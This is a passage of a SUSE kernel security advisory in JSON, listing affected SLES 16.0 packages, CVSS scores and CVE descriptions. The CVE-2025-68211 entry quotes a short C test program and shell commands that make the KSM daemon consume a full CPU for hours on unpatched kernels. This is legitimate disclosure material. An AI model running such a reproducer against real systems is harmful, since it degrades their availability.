"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksm: use range-walk function to jump over holes in scan_get_next_rmap_item\n\nCurrently, scan_get_next_rmap_item() walks every page address in a VMA to\nlocate mergeable pages. This becomes highly inefficient when scanning\nlarge virtual memory areas that contain mostly unmapped regions, causing\nksmd to use large amount of cpu without deduplicating much pages.\n\nThis patch replaces the per-address lookup with a range walk using\nwalk_page_range(). The range walker allows KSM to skip over entire\nunmapped holes in a VMA, avoiding unnecessary lookups. This problem was\npreviously discussed in [1].\n\nConsider the following test program which creates a 32 TiB mapping in the\nvirtual address space but only populates a single page:\n\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/mman.h\u003e\n\n/* 32 TiB */\nconst size_t size = 32ul * 1024 * 1024 * 1024 * 1024;\n\nint main() {\n char *area = mmap(NULL, size, PROT_READ | PROT_WRITE,\n MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0);\n\n if (area == MAP_FAILED) {\n perror(\"mmap() failed\\n\");\n return -1;\n }\n\n /* Populate a single page such that we get an anon_vma. */\n *area = 0;\n\n /* Enable KSM. */\n madvise(area, size, MADV_MERGEABLE);\n pause();\n return 0;\n}\n\n$ ./ksm-sparse \u0026\n$ echo 1 \u003e /sys/kernel/mm/ksm/run \n\nWithout this patch ksmd uses 100% of the cpu for a long time (more then 1\nhour in my test machine) scanning all the 32 TiB virtual address space\nthat contain only one mapped page. This makes ksmd essentially deadlocked\nnot able to deduplicate anything of value. With this patch ksmd walks\nonly the one mapped page and skips the rest of the 32 TiB virtual address\nspace, making the scan fast using little cpu.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68211",
"url": "https://www.suse.com/security/cve/CVE-2025-68211"
},
{
"category": "external",
"summary": "SUSE Bug 1255319 for CVE-2025-68211",
"url": "https://bugzilla.suse.com/1255319"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
